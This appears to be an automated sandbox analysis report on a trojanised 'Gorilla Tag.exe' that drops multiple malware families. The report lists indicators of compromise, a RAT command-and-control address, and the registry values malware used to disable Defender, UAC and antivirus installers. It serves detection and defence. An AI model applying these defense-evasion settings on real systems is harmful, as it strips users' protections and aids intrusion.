azorult | 27fb5aa684dda1deaef7735d18d9df92c616cd9216d47f7a050293194c97176f

Analysis

max time kernel
900s
max time network
906s
platform
windows11-21h2_x64
resource
win11-20250218-en
resource tags

arch:x64arch:x86image:win11-20250218-enlocale:en-usos:windows11-21h2-x64system
submitted
24/02/2025, 04:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Gorilla Tag.exe
Size

651KB
MD5

96f469bc1ad1ffe1a66fd2f0339a57a3
SHA1

6e0559a8ce322a795c1cd8787967c0f6dd09e804
SHA256

27fb5aa684dda1deaef7735d18d9df92c616cd9216d47f7a050293194c97176f
SHA512

b36bca90a78c9d18c9fa944c844e8992f02b353750b1f63760b44d9eae036dde507ed492f6f798f3870ba5692461b9f5a5da9e439eb903b8fb15344e7fe554ab
SSDEEP

3072:zQJ/VdFgIW9mYucJ/OD8JlsI9mTIOgSnk:4/7FG9mpcJ/OD8//

Malware Config

Extracted

Family

crimsonrat

185.136.161.124

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Azorult family
azorult

Chimera 64 IoCs

Ransomware which infects local and network files, often distributed via Dropbox links.

ransomware chimera

description	ioc	Process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\da-dk\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\eu-es\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ar-ae\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-si\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files\7-Zip\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ro-ro\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-il\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nb-no\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-ma\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nb-no\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\uk-ua\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-si\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hu-hu\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\uk-ua\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\tr-tr\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-cn\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ro-ro\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-tw\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-ma\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ca-es\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sk-sk\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-il\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sv-se\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\uk-ua\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-il\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML	OneDrive.exe

Chimera family
chimera

CrimsonRAT main payload 1 IoCs

resource	yara_rule
behavioral1/files/0x000b00000002bdcd-14780.dat	family_crimsonrat

CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
rat crimsonrat
Crimsonrat family
crimsonrat

Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs

defense_evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	taskhostw.exe

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	7088	7584	OfficeC2RClient.exe	734
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	7228	1704	OfficeC2RClient.exe	737
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	6096	6832	OfficeC2RClient.exe	739

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Rms family
rms

UAC bypass 3 TTPs 5 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe

Windows security bypass 2 TTPs 1 IoCs

defense_evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	regedit.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
7740	net.exe
7792	net1.exe

Renames multiple (3162) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Blocks application from running via registry modification 13 IoCs

Adds application to list of disallowed applications.

defense_evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	Azorult.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	Azorult.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	Azorult.exe

Downloads MZ/PE file 12 IoCs

flow	pid	Process
470	2984	firefox.exe
470	2984	firefox.exe
470	2984	firefox.exe
587	2984	firefox.exe
663	2984	firefox.exe
663	2984	firefox.exe
663	2984	firefox.exe
663	2984	firefox.exe
663	2984	firefox.exe
663	2984	firefox.exe
663	2984	firefox.exe
686	2984	firefox.exe

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Azorult.exe

Modifies Windows Firewall 2 TTPs 23 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
6252	netsh.exe
1652	netsh.exe
5432	netsh.exe
6484	netsh.exe
6552	netsh.exe
1364	netsh.exe
7632	netsh.exe
6696	netsh.exe
7340	netsh.exe
6892	netsh.exe
3592	netsh.exe
1132	netsh.exe
7208	netsh.exe
4972	netsh.exe
5024	netsh.exe
4868	netsh.exe
5260	netsh.exe
4344	netsh.exe
7856	netsh.exe
7400	netsh.exe
2068	netsh.exe
8168	netsh.exe
5260	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Sets file to hidden 1 TTPs 3 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
7424	attrib.exe
1764	attrib.exe
2928	attrib.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 53 IoCs

pid	Process
2752	OneDriveSetup.exe
3652	OneDriveSetup.exe
1048	FileSyncConfig.exe
4980	OneDrive.exe
8032	FileCoAuth.exe
4788	FileCoAuth.exe
5504	FileCoAuth.exe
2968	FileCoAuth.exe
7396	MinecraftInstaller(1).exe
4516	Minecraft.exe
2904	FreeLauncher.exe
832	FreeLauncher.exe
7980	FreeLauncher.exe
1084	FreeLauncher.exe
5588	FreeLauncher.exe
7844	FreeLauncher.exe
5428	butterflyondesktop.exe
4944	butterflyondesktop.tmp
1408	ButterflyOnDesktop.exe
7984	HawkEye.exe
1452	Lokibot.exe
3324	Lokibot.exe
6024	Azorult.exe
4688	wini.exe
1952	winit.exe
1644	rutserv.exe
992	rutserv.exe
468	rutserv.exe
3900	rutserv.exe
1080	rfusclient.exe
3116	rfusclient.exe
7392	cheat.exe
4264	taskhost.exe
1004	P.exe
6484	ink.exe
7528	rfusclient.exe
3328	Lokibot.exe
5568	R8.exe
4028	Rar.exe
6988	winlog.exe
1220	winlogon.exe
1964	RDPWInst.exe
2976	taskhostw.exe
6324	winlogon.exe
2740	RDPWInst.exe
5820	taskhostw.exe
4840	BlueScreen(1).exe
6608	taskhostw.exe
4868	CrimsonRAT.exe
7716	dlrarhsiva.exe
8336	VanToM-Rat.bat
8636	Server.exe
8728	taskhostw.exe

Loads dropped DLL 64 IoCs

pid	Process
1048	FileSyncConfig.exe
1048	FileSyncConfig.exe
1048	FileSyncConfig.exe
1048	FileSyncConfig.exe
1048	FileSyncConfig.exe
1048	FileSyncConfig.exe
1048	FileSyncConfig.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4980	OneDrive.exe
4776	DllHost.exe
3160	DllHost.exe
6824	DllHost.exe
8032	FileCoAuth.exe
8032	FileCoAuth.exe
8032	FileCoAuth.exe
8032	FileCoAuth.exe
8032	FileCoAuth.exe
8032	FileCoAuth.exe
8032	FileCoAuth.exe
7936	UserOOBEBroker.exe
4788	FileCoAuth.exe
4788	FileCoAuth.exe
4788	FileCoAuth.exe
4788	FileCoAuth.exe
4788	FileCoAuth.exe
4788	FileCoAuth.exe
4788	FileCoAuth.exe
5504	FileCoAuth.exe
5504	FileCoAuth.exe
5504	FileCoAuth.exe
5504	FileCoAuth.exe

Modifies file permissions 1 TTPs 62 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
7712	icacls.exe
3756	icacls.exe
2928	icacls.exe
7520	icacls.exe
5428	icacls.exe
5024	icacls.exe
8168	icacls.exe
7024	icacls.exe
7368	icacls.exe
4972	icacls.exe
4432	icacls.exe
1416	icacls.exe
7520	icacls.exe
3592	icacls.exe
4112	icacls.exe
1784	icacls.exe
2600	icacls.exe
6892	icacls.exe
2400	icacls.exe
3928	icacls.exe
6892	icacls.exe
1784	icacls.exe
7116	icacls.exe
1784	icacls.exe
4084	icacls.exe
8156	icacls.exe
6096	icacls.exe
1452	icacls.exe
468	icacls.exe
3692	icacls.exe
5904	icacls.exe
1700	icacls.exe
7804	icacls.exe
7280	icacls.exe
1264	icacls.exe
6948	icacls.exe
4112	icacls.exe
7208	icacls.exe
3756	icacls.exe
5292	icacls.exe
5428	icacls.exe
4868	icacls.exe
7528	icacls.exe
7716	icacls.exe
7068	icacls.exe
3328	icacls.exe
4112	icacls.exe
2712	icacls.exe
6016	icacls.exe
6016	icacls.exe
5820	icacls.exe
7704	icacls.exe
5568	icacls.exe
3324	icacls.exe
7804	icacls.exe
7208	icacls.exe
1236	icacls.exe
1204	icacls.exe
6508	icacls.exe
7208	icacls.exe
7208	icacls.exe
7804	icacls.exe

Modifies system executable filetype association 2 TTPs 7 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}"	OneDrive.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe

Obfuscated with Agile.Net obfuscator 2 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/memory/1452-13392-0x0000000000B10000-0x0000000000B24000-memory.dmp	agile_net
behavioral1/memory/3324-13485-0x0000000000F10000-0x0000000000F24000-memory.dmp	agile_net

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
